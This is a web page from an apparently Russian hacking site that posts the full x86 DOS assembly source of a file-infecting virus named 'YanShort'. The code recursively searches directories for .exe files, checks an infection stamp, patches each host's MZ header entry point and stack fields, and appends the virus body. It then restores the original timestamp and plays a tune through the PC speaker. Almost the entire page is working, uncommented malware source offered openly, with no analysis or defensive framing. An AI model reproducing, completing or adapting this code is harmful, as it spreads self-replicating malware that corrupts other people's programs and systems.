<html><head><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=FrontPage.Editor.Document><title>bablo</title></head><body><p><b><font size=5>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&#1042;&#1080;&#1088;&#1091;&#1089; YanShort</font></b><p style="MARGIN: 0px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 150%">&nbsp;
<p><font face="Verdana" size="2">&#1055;&#1088;&#1080;&#1089;&#1083;&#1072;&#1083;&#1080;
&#1073;&#1077;&#1079;
&#1082;&#1086;&#1084;&#1077;&#1085;&#1090;&#1072;&#1088;&#1080;&#1077;&#1074;,
&#1082;&#1072;&#1082; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1103;
&#1077;&#1075;&#1086; &#1089;&#1086;&#1086;&#1073;&#1088;&#1072;&#1078;&#1091;
&#1085;&#1072; &#1072;&#1089;&#1077;&#1084;&#1073;&#1083;&#1077;&#1088;&#1077;
&#1085;&#1072;&#1087;&#1080;&#1096;&#1091;
&#1082;&#1086;&#1084;&#1077;&#1085;&#1090;&#1072;&#1088;&#1080;&#1080;!<br>
<br>
<br>
<br>
data_area struc&nbsp;<br>
<br>
DS_save dw ?<br>
ES_save dw ?<br>
IP_save dw ?<br>
CS_save dw ?<br>
SS_save dw ?<br>
filematch db '*.exe',00h&nbsp;<br>
matchall db '*.*',00h&nbsp;<br>
infected dw 00h&nbsp;<br>
help_flag dw 00h&nbsp;<br>
where_from_flag dw 00h&nbsp;<br>
<br>
<br>
<br>
<br>
handle dw ?&nbsp;<br>
ip_old dw ?&nbsp;<br>
cs_old dw ?&nbsp;<br>
ss_old dw ?<br>
far_push dw ?<br>
save_push dw ?<br>
buffer1 db '\',63 dup (?)<br>
virus_stamp db 'motherfucker' ;<br>
buffer2 db 2b0h dup (?)<br>
new_area db 64 dup (?)<br>
new_data db 64 dup (?)<br>
pointer1 dw ?<br>
pointer2 dw ?<br>
pointer3 dw ?<br>
pointer4 dw ?<br>
pointer5 dw ?<br>
pointer6 dw ?<br>
pointer7 dw ?<br>
pointer8 dw ?<br>
<br>
data_area ends&nbsp;<br>
<br>
org 100h&nbsp;<br>
<br>
start: call setup_data&nbsp;<br>
<br>
<br>
<br>
<br>
adjust equ offset pgm_start&nbsp;<br>
pgm_start label word<br>
virussize equ 2793<br>
<br>
work: mov ax,ds&nbsp;<br>
push cs<br>
pop ds&nbsp;<br>
mov si,offset buffer.DS_save&nbsp;<br>
sub si,adjust<br>
add si,bx<br>
mov [si],ax<br>
mov si,offset buffer.ES_save&nbsp;<br>
sub si,adjust<br>
add si,bx<br>
mov ax,es<br>
mov [si],ax<br>
push cs&nbsp;<br>
pop es<br>
push bx&nbsp;<br>
<br>
mov ax,2f00h&nbsp;<br>
int 21h<br>
mov cx,bx&nbsp;<br>
pop bx<br>
mov si,offset buffer.pointer1&nbsp;<br>
sub si,adjust<br>
add si,bx<br>
mov [si],cx<br>
add si,2&nbsp;<br>
mov ax,es<br>
mov [si],ax&nbsp;<br>
push cs<br>
pop es<br>
mov di,offset buffer.buffer1&nbsp;<br>
inc di&nbsp;<br>
sub di,adjust<br>
add di,bx<br>
mov dx,0000h<br>
push bx<br>
call search_exe<br>
pop bx<br>
mov si,offset buffer.where_from_flag<br>
sub si,adjust<br>
add si,bx<br>
cmp word ptr [si],0000h<br>
jnz infected_run&nbsp;<br>
int 020H<br>
<br>
infected_run:<br>
mov si,offset buffer.pointer1<br>
sub si,adjust<br>
add si,bx<br>
mov dx,[si]<br>
push ds<br>
mov ax,[si+2]<br>
mov ds,ax<br>
push bx<br>
mov ax,1a00h<br>
int 21h<br>
pop bx<br>
pop ds&nbsp;<br>
mov si,offset buffer.ES_save<br>
sub si,adjust<br>
add si,bx<br>
mov ax,[si]<br>
mov es,ax&nbsp;<br>
push bx&nbsp;<br>
call mary_proc<br>
pop bx<br>
mov si,offset buffer.IP_save<br>
sub si,adjust<br>
add si,bx<br>
mov ax,[si]<br>
mov dx,[si+2]<br>
mov si,offset buffer.far_push&nbsp;<br>
sub si,adjust&nbsp;<br>
add si,bx<br>
mov cx,[si]<br>
push ax<br>
mov ax,cs<br>
sub ax,cx<br>
mov di,ax&nbsp;<br>
add dx,ax<br>
pop ax<br>
<br>
mov si,offset buffer.SS_save<br>
sub si,adjust&nbsp;<br>
add si,bx<br>
mov cx,word ptr [si]<br>
add cx,di<br>
<br>
push es<br>
pop ds<br>
<br>
cli<br>
mov ss,cx<br>
sti<br>
push dx<br>
push ax<br>
retf<br>
<br>
search_exe PROC<br>
push si<br>
push dx<br>
call transfer_filespec&nbsp;<br>
<br>
call find_first&nbsp;<br>
jc not_here&nbsp;<br>
call try_to_infect&nbsp;<br>
<br>
mov si,offset buffer.infected<br>
sub si,adjust<br>
add si,bx<br>
test word ptr [si],0ffffh<br>
jz try_next<br>
jmp quiet_exit<br>
<br>
try_next:<br>
call find_next&nbsp;<br>
<br>
jc not_here<br>
call try_to_infect&nbsp;<br>
mov si,offset buffer.infected&nbsp;<br>
sub si,adjust<br>
add si,bx<br>
test word ptr [si],0ffffh<br>
jz try_next<br>
jmp quiet_exit&nbsp;<br>
<br>
not_here:<br>
pop dx&nbsp;<br>
push dx&nbsp;<br>
call search_all<br>
call find_first<br>
jnc attribute_test&nbsp;<br>
<br>
quiet_exit:<br>
pop dx<br>
pop si<br>
ret<br>
<br>
attribute_test:&nbsp;<br>
mov si,dx&nbsp;<br>
test byte ptr [si+015h],010h&nbsp;<br>
<br>
<br>
jne dir_found&nbsp;<br>
more_tries:<br>
call find_next&nbsp;<br>
<br>
<br>
jc quiet_exit&nbsp;<br>
test byte ptr [si+015h],010h<br>
jz more_tries&nbsp;<br>
dir_found:<br>
cmp byte ptr [si+01Eh],02Eh&nbsp;<br>
<br>
jz more_tries&nbsp;<br>
<br>
call dta_compute&nbsp;<br>
<br>
push ax<br>
mov ah,01Ah&nbsp;<br>
int 021h<br>
pop ax<br>
push si<br>
mov si,offset buffer.infected&nbsp;<br>
sub si,adjust<br>
add si,bx<br>
test word ptr [si],0ffffh<br>
pop si<br>
jnz quiet_exit<br>
jmp more_tries&nbsp;<br>
search_exe ENDP<br>
<br>
dta_compute PROC<br>
push di&nbsp;<br>
push si<br>
push ax<br>
push bx<br>
cld&nbsp;<br>
mov si,dx&nbsp;<br>
add si,01EH&nbsp;<br>
<br>
store_loop:<br>
lodsb&nbsp;<br>
stosb&nbsp;<br>
or al,al<br>
jne store_loop&nbsp;<br>
std<br>
stosb&nbsp;<br>
mov al,05Ch&nbsp;<br>
stosb&nbsp;<br>
add di,2&nbsp;<br>
call search_exe&nbsp;<br>
pop bx&nbsp;<br>
pop ax<br>
pop si<br>
pop di<br>
ret&nbsp;<br>
dta_compute ENDP<br>
<br>
try_to_infect PROC&nbsp;<br>
push ax<br>
push bx<br>
push cx<br>
push dx<br>
push si<br>
push di<br>
<br>
push es<br>
push bx<br>
mov ax,2f00h&nbsp;<br>
int 21h<br>
mov ax,bx<br>
pop bx<br>
mov si,offset buffer.pointer3<br>
sub si,adjust<br>
add si,bx<br>
mov [si],ax&nbsp;<br>
add si,2<br>
mov ax,es<br>
mov [si],ax<br>
pop es&nbsp;<br>
<br>
mov dx,offset buffer.new_data<br>
sub dx,adjust<br>
add dx,bx<br>
push bx<br>
mov ax,1a00h<br>
int 21h&nbsp;<br>
pop bx&nbsp;<br>
mov di,offset buffer.new_area<br>
mov si,offset buffer.buffer1<br>
sub di,adjust<br>
sub si,adjust<br>
add di,bx<br>
add si,bx<br>
cld&nbsp;<br>
<br>
move_path:&nbsp;<br>
lodsb<br>
stosb<br>
or al,al<br>
jnz move_path<br>
std&nbsp;<br>
mov al,'\'&nbsp;<br>
mov cx,0040h<br>
std&nbsp;<br>
repne scasb<br>
<br>
mov si,offset buffer.pointer3<br>
sub si,adjust<br>
add si,bx<br>
mov ax,[si]<br>
mov si,ax<br>
add di,2&nbsp;<br>
o_kay:<br>
add si,001eh&nbsp;<br>
cld&nbsp;<br>
move_fnm:<br>
lodsb<br>
stosb<br>
or al,al<br>
jnz move_fnm<br>
<br>
push dx<br>
push bx<br>
mov dx,offset buffer.new_area<br>
sub dx,adjust<br>
add dx,bx<br>
mov ax,3d02h&nbsp;<br>
int 21h<br>
pop bx<br>
pop dx<br>
jnc go_ahead&nbsp;<br>
jmp error_exit<br>
go_ahead:<br>
mov si,offset buffer.handle<br>
sub si,adjust<br>
add si,bx<br>
mov [si],ax&nbsp;<br>
<br>
push bx<br>
mov bx,ax&nbsp;<br>
push dx<br>
mov cx,0000h&nbsp;<br>
mov dx,0000h&nbsp;<br>
mov ax,4202h&nbsp;<br>
int 21h<br>
mov cx,dx<br>
pop dx<br>
pop bx<br>
jnc compute_length<br>
jmp close_error<br>
<br>
compute_length:<br>
sub ax,000ch<br>
sbb cx,0000h&nbsp;<br>
save_offset:<br>
mov si,offset buffer.pointer5<br>
sub si,adjust<br>
add si,bx<br>
mov [si],ax<br>
add si,2<br>
mov [si],cx<br>
<br>
push bx<br>
push dx<br>
mov si,offset buffer.handle<br>
sub si,adjust<br>
add si,bx<br>
mov bx,[si]<br>
mov dx,ax<br>
mov ax,4200h&nbsp;<br>
int 21h&nbsp;<br>
pop dx<br>
pop bx<br>
jnc set_buffer<br>
jmp close_error<br>
<br>
set_buffer:&nbsp;<br>
push bx<br>
push dx<br>
mov dx,offset buffer.new_data<br>
sub dx,adjust<br>
add dx,bx<br>
mov si,offset buffer.handle<br>
sub si,adjust<br>
add si,bx<br>
mov bx,[si]&nbsp;<br>
mov cx,000ch<br>
mov ax,3f00h<br>
int 21h&nbsp;<br>
pop dx<br>
pop bx<br>
jnc read_ok<br>
jmp close_error<br>
<br>
read_ok:<br>
mov si,offset buffer.virus_stamp<br>
mov di,offset buffer.new_data<br>
sub si,adjust<br>
sub di,adjust<br>
add si,bx<br>
add di,bx<br>
mov cx,12&nbsp;<br>
repe cmpsb<br>
pushf<br>
mov si,offset buffer.infected&nbsp;<br>
sub si,adjust<br>
add si,bx<br>
mov word ptr [si],0000h&nbsp;<br>
popf<br>
jnz infect_it<br>
<br>
close_error:<br>
mov si,offset buffer.handle<br>
sub si,adjust<br>
add si,bx<br>
push bx<br>
mov bx,[si]<br>
mov ax,3e00h&nbsp;<br>
int 21h<br>
pop bx<br>
jmp error_exit<br>
<br>
infect_it:<br>
mov si,offset buffer.infected&nbsp;<br>
sub si,adjust<br>
add si,bx<br>
mov word ptr [si],7777h&nbsp;<br>
<br>
mov si,offset buffer.where_from_flag<br>
sub si,adjust<br>
add si,bx<br>
mov ax,[si]<br>
sub si,2<br>
mov [si],ax&nbsp;<br>
<br>
add si,2<br>
mov [si],5a5ah&nbsp;<br>
push bx<br>
push dx<br>
mov si,offset buffer.handle<br>
sub si,adjust<br>
add si,bx<br>
mov bx,[si]<br>
xor cx,cx<br>
xor dx,dx<br>
mov ax,4200h&nbsp;<br>
int 21h&nbsp;<br>
pop dx<br>
pop bx<br>
jnc set_new_data<br>
jmp append_ok<br>
<br>
set_new_data:<br>
push bx<br>
push dx<br>
mov dx,offset buffer.new_data<br>
sub dx,adjust<br>
add dx,bx<br>
mov si,offset buffer.handle<br>
sub si,adjust<br>
add si,bx<br>
mov bx,[si]&nbsp;<br>
mov cx,001bh&nbsp;<br>
mov ax,3f00h<br>
int 21h&nbsp;<br>
pop dx<br>
pop bx<br>
jnc read_header<br>
jmp append_ok<br>
<br>
read_header:<br>
nop&nbsp;<br>
mov si,offset buffer.pointer5<br>
sub si,adjust<br>
add si,bx<br>
mov ax,[si]<br>
add si,2<br>
add ax,0ch<br>
adc word ptr [si],0000h<br>
sub si,2<br>
mov [si],ax&nbsp;<br>
mov si,offset buffer.new_data<br>
sub si,adjust<br>
add si,bx<br>
mov ax,[si]<br>
cmp ax,5a4dh&nbsp;<br>
jz valid_exe<br>
jmp append_ok<br>
<br>
valid_exe:<br>
mov ax,[si+8]&nbsp;<br>
xor dx,dx<br>
shl ax,1<br>
rcl dx,1<br>
shl ax,1<br>
rcl dx,1<br>
shl ax,1<br>
rcl dx,1<br>
shl ax,1<br>
rcl dx,1&nbsp;<br>
<br>
push ax<br>
push dx&nbsp;<br>
push cx<br>
mov dx,virussize-896+64<br>
push dx<br>
mov cx,0009h<br>
shr dx,cl<br>
add word ptr [si+4],dx<br>
pop dx<br>
and dx,01ffh<br>
add dx,word ptr [si+2]<br>
cmp dx,512<br>
jl adjust_okay<br>
sub dx,512<br>
inc word ptr [si+4]<br>
adjust_okay:<br>
mov word ptr [si+2],dx&nbsp;<br>
pop cx<br>
pop dx<br>
pop ax<br>
<br>
push si&nbsp;<br>
mov si,offset buffer.pointer5<br>
sub si,adjust<br>
add si,bx<br>
sub [si],ax<br>
mov ax,[si]<br>
sbb [si+2],dx<br>
mov dx,[si+2]&nbsp;<br>
pop si<br>
<br>
push ax<br>
push dx<br>
mov ax,[si+14h]<br>
mov dx,[si+16h]&nbsp;<br>
mov cx,[si+0eh]&nbsp;<br>
push si<br>
mov si,offset buffer.IP_save<br>
sub si,adjust<br>
add si,bx<br>
xchg [si],ax<br>
xchg [si+2],dx<br>
mov si,offset buffer.SS_save<br>
sub si,adjust<br>
add si,bx<br>
xchg [si],cx<br>
mov si,offset buffer.ip_old<br>
sub si,adjust<br>
add si,bx<br>
mov [si],ax<br>
mov [si+2],dx<br>
mov si,offset buffer.ss_old<br>
sub si,adjust<br>
add si,bx<br>
mov [si],cx<br>
pop si<br>
pop dx<br>
pop ax<br>
<br>
push ax<br>
push dx<br>
<br>
shl ax,1<br>
rcl dx,1<br>
shl ax,1<br>
rcl dx,1<br>
shl ax,1<br>
rcl dx,1<br>
shl ax,1<br>
rcl dx,1&nbsp;<br>
<br>
mov cx,0008h<br>
shl dx,cl<br>
mov cx,0004h<br>
shr ax,cl&nbsp;<br>
<br>
mov [si+14h],ax<br>
mov [si+16h],dx&nbsp;<br>
<br>
push si<br>
mov si,offset buffer.far_push<br>
sub si,adjust<br>
add si,bx<br>
xchg [si],dx<br>
mov word ptr [si+2],dx<br>
pop si<br>
<br>
pop dx<br>
pop ax<br>
add ax,virussize&nbsp;<br>
adc dx,0000h<br>
mov cx,0003h&nbsp;<br>
<br>
mul_loop:<br>
shl ax,1<br>
rcl dx,1<br>
shl ax,1<br>
rcl dx,1<br>
shl ax,1<br>
rcl dx,1<br>
shl ax,1<br>
rcl dx,1&nbsp;<br>
loop mul_loop<br>
<br>
or ax,ax<br>
jz exact_value<br>
inc dx<br>
exact_value:&nbsp;<br>
mov [si+0eh],dx&nbsp;<br>
<br>
push si<br>
push bx<br>
mov si,offset buffer.handle<br>
sub si,adjust<br>
add si,bx<br>
mov bx,[si]<br>
mov ax,5700h&nbsp;<br>
int 21h<br>
pop bx<br>
pop si<br>
jnc correct_time<br>
jmp append_ok1<br>
<br>
correct_time:<br>
push cx<br>
push bx<br>
push dx<br>
mov si,offset buffer.handle<br>
sub si,adjust<br>
add si,bx<br>
mov bx,[si]<br>
xor cx,cx<br>
xor dx,dx<br>
mov ax,4200h&nbsp;<br>
int 21h&nbsp;<br>
pop dx<br>
pop bx<br>
pop cx<br>
jnc continue_infection<br>
jmp append_ok1<br>
<br>
continue_infection:<br>
push cx<br>
push dx<br>
push bx<br>
mov dx,offset buffer.new_data<br>
sub dx,adjust<br>
add dx,bx<br>
mov si,offset buffer.handle<br>
sub si,adjust<br>
add si,bx<br>
mov bx,[si]&nbsp;<br>
mov cx,001bh&nbsp;<br>
mov ax,4000h<br>
int 21h&nbsp;<br>
pop bx<br>
pop dx<br>
pop cx<br>
jnc glue_virus<br>
jmp append_ok1<br>
<br>
glue_virus:<br>
push cx<br>
push bx<br>
push dx<br>
mov si,offset buffer.handle<br>
sub si,adjust<br>
add si,bx<br>
mov bx,[si]<br>
xor cx,cx<br>
xor dx,dx<br>
mov ax,4202h&nbsp;<br>
int 21h&nbsp;<br>
pop dx<br>
pop bx<br>
pop cx<br>
jnc write_data<br>
jmp append_ok1<br>
<br>
write_data:<br>
mov si,offset buffer.handle<br>
sub si,adjust<br>
add si,bx<br>
<br>
push dx<br>
push cx<br>
mov dx,bx<br>
sub dx,3&nbsp;<br>
push es<br>
push bx<br>
push dx<br>
push si<br>
mov ax,2f00h<br>
int 21h<br>
pop si<br>
pop dx<br>
push es<br>
push bx<br>
push si<br>
mov ax,1a00h<br>
int 21h<br>
pop si<br>
mov bx,[si]&nbsp;<br>
mov cx,virussize-896+64&nbsp;<br>
mov ax,4000h&nbsp;<br>
int 21h<br>
lahf&nbsp;<br>
pop bx<br>
pop es<br>
push ds<br>
push es<br>
pop ds<br>
mov dx,bx<br>
<br>
push ax<br>
mov ax,1a00h<br>
int 21h<br>
pop ax<br>
pop ds<br>
pop bx<br>
pop es<br>
pop cx<br>
pop dx<br>
<br>
sahf<br>
jnc put_stamp&nbsp;<br>
jmp append_ok1&nbsp;<br>
<br>
put_stamp:<br>
push bx<br>
mov si,offset buffer.handle<br>
sub si,adjust<br>
add si,bx<br>
mov bx,[si]<br>
mov ax,5701h&nbsp;<br>
int 21h<br>
pop bx<br>
append_ok1:<br>
mov si,offset buffer.ip_old&nbsp;<br>
sub si,adjust<br>
add si,bx<br>
mov ax,[si]<br>
mov dx,[si+2]<br>
mov si,offset buffer.IP_save<br>
sub si,adjust<br>
add si,bx<br>
mov [si],ax<br>
mov [si+2],dx&nbsp;<br>
mov si,offset buffer.save_push<br>
sub si,adjust<br>
add si,bx<br>
mov ax,[si]<br>
mov word ptr [si-2],ax<br>
mov si,offset buffer.ss_old<br>
sub si,adjust<br>
add si,bx<br>
mov ax,[si]<br>
mov si,offset buffer.SS_save<br>
sub si,adjust<br>
add si,bx<br>
mov word ptr [si],ax<br>
append_ok:<br>
mov si,offset buffer.help_flag<br>
sub si,adjust<br>
add si,bx<br>
mov ax,[si]<br>
add si,2<br>
mov [si],ax&nbsp;<br>
<br>
jmp close_error<br>
error_exit:<br>
mov si,offset buffer.pointer3<br>
sub si,adjust<br>
add si,bx<br>
mov dx,[si]&nbsp;<br>
add si,2<br>
mov ax,[si]<br>
push ds<br>
mov ds,ax<br>
mov ax,1a00h&nbsp;<br>
int 21h<br>
pop ds<br>
pop di<br>
pop si<br>
pop dx<br>
pop cx<br>
pop bx<br>
pop ax<br>
ret&nbsp;<br>
try_to_infect ENDP<br>
<br>
transfer_filespec PROC<br>
push si<br>
mov si,offset buffer.filematch&nbsp;<br>
sub si,adjust<br>
add si,bx<br>
call byte_move<br>
pop si<br>
ret&nbsp;<br>
transfer_filespec ENDP<br>
<br>
search_all PROC<br>
push si<br>
mov si,offset buffer.matchall&nbsp;<br>
sub si,adjust<br>
add si,bx<br>
call byte_move<br>
pop si<br>
ret&nbsp;<br>
search_all ENDP<br>
<br>
byte_move PROC<br>
push ax<br>
push di<br>
cld&nbsp;<br>
move_loop:<br>
lodsb&nbsp;<br>
stosb&nbsp;<br>
or al,al&nbsp;<br>
jne move_loop<br>
pop di<br>
pop ax<br>
ret&nbsp;<br>
byte_move ENDP<br>
<br>
find_first PROC<br>
push cx<br>
push bx<br>
cmp dx,0000h<br>
jnbe over_set<br>
mov dx,offset buffer.buffer2&nbsp;<br>
sub dx,adjust&nbsp;<br>
add dx,bx<br>
over_set:<br>
add dx,02Bh<br>
mov cx,00010h&nbsp;<br>
mov ah,01ah<br>
int 021h&nbsp;<br>
pop bx<br>
push bx<br>
push dx<br>
mov dx,offset buffer.buffer1<br>
sub dx,adjust<br>
add dx,bx<br>
mov ah,04eh&nbsp;<br>
int 021h<br>
pop dx<br>
pop bx<br>
pop cx<br>
ret&nbsp;<br>
find_first ENDP<br>
<br>
find_next PROC<br>
push cx<br>
push bx<br>
push dx<br>
mov dx,offset buffer.buffer1<br>
sub dx,adjust<br>
add dx,bx<br>
mov cx,00010h<br>
mov ah,04fh&nbsp;<br>
int 021h<br>
pop dx<br>
pop bx<br>
pop cx<br>
ret&nbsp;<br>
find_next ENDP<br>
<br>
delay PROC<br>
push ax<br>
push bx<br>
push cx<br>
push dx<br>
mov ah,2ch&nbsp;<br>
int 21h<br>
mov ah,ch<br>
add al,cl<br>
add bh,dh<br>
add bl,dl<br>
cmp bl,100<br>
jb secs<br>
sub bl,100<br>
inc bh<br>
secs:<br>
cmp bh,60<br>
jb mins<br>
sub bh,60<br>
inc al<br>
mins:&nbsp;<br>
cmp al,60<br>
jb hours<br>
sub al,60<br>
inc ah<br>
hours:<br>
cmp ah,24<br>
jne tcheck<br>
sub ah,ah<br>
tcheck:<br>
push ax<br>
mov ah,2ch<br>
int 21h<br>
pop ax<br>
cmp cx,ax<br>
ja tdquit<br>
jb tcheck<br>
cmp dx,bx<br>
jb tcheck<br>
tdquit:<br>
pop dx<br>
pop cx<br>
pop bx<br>
pop ax<br>
ret<br>
delay ENDP&nbsp;<br>
<br>
sound PROC<br>
push ax<br>
push cx<br>
push dx<br>
push di<br>
<br>
mov al,0b6h<br>
out 43h,al<br>
mov dx,14h<br>
mov ax,533h*896<br>
div di<br>
out 42h,al<br>
mov al,ah<br>
out 42h,al<br>
in al,61h<br>
mov ah,al<br>
or al,3<br>
out 61h,al<br>
mov al,cl<br>
call delay<br>
mov al,ah<br>
out 61h,al<br>
pop di<br>
pop dx<br>
pop cx<br>
pop ax<br>
ret<br>
sound ENDP<br>
<br>
music_play PROC<br>
push bx<br>
push cx<br>
push di<br>
push si<br>
push bp<br>
freq:<br>
mov di,[si]<br>
cmp di,0ffffh<br>
je end_play<br>
mov bl,ds:[bp]<br>
sub cl,cl<br>
sub bh,bh<br>
call sound<br>
add si,2<br>
inc bp<br>
jnz freq<br>
end_play:<br>
pop bp<br>
pop si<br>
pop di<br>
pop cx<br>
pop bx<br>
ret<br>
music_play ENDP<br>
<br>
mary_proc PROC<br>
push bx<br>
push bp<br>
mov si,offset mary_freq<br>
mov bp,offset mary_time<br>
sub si,adjust<br>
sub bp,adjust<br>
add si,bx<br>
add bp,bx<br>
call music_play<br>
pop bp<br>
pop bx<br>
ret&nbsp;<br>
mary_proc ENDP<br>
<br>
mary_freq dw 262,262,293,329,262,329,293,196<br>
dw 262,262,293,329,262,262<br>
dw 262,262,293,329,349,329,293,262<br>
dw 246,196,220,246,262,262<br>
dw 220,246,220,174,220,246,262,220<br>
dw 196,220,196,174,164,174,196<br>
dw 220,246,220,174,220,246,262,220<br>
dw 196,262,246,293,262,262,0ffffh<br>
mary_time db 8 dup(25)<br>
db 4 dup(25), 50, 50<br>
db 8 dup(25)<br>
db 4 dup(25), 50, 50<br>
db 26, 25, 26, 5 dup(25)<br>
db 26, 25, 26, 3 dup(25), 30<br>
db 26, 25, 26, 4 dup(25), 30<br>
db 4 dup(25), 50, 50<br>
setup_data:<br>
cli<br>
pop bx&nbsp;<br>
push bx&nbsp;<br>
sti&nbsp;<br>
ret&nbsp;<br>
buffer data_area &lt;&gt;&nbsp;<br>
<br>
<br>
&#1087;&#1088;&#1080;&#1089;&#1083;&#1072;&#1083;: <font color="#0000FF"><u>Joveres</u></font><br>
<br>
<br>
</font>
<p>&nbsp; <table cellSpacing=0 cellPadding=2 width=100% border=0><tbody><tr><td><font face=Arial color=#000000 size=1>Copyright � &quot;&nbsp;<a href="http://xs.by.ru">HACK-INFO</a>&quot;&nbsp; &quot; <a href=mailto:info@xakep.dax.ru>info@xakep.dax.ru</a>&quot;<br>&#1055;&#1088;&#1080; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1085;&#1080;&#1080; &#1084;&#1072;&#1090;&#1077;&#1088;&#1080;&#1072;&#1083;&#1086;&#1074; &#1086;&#1073;&#1103;&#1079;&#1072;&#1090;&#1077;&#1083;&#1100;&#1085;&#1072; &#1089;&#1089;&#1099;&#1083;&#1082;&#1072; &#1085;&#1072;&nbsp;
        <a target="_blank" href="http://xs.by.ru">http://hack-info.tk </a>.</font></td></tr></tbody></table><p style="MARGIN: 0px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 100%">&nbsp;</p></body></html>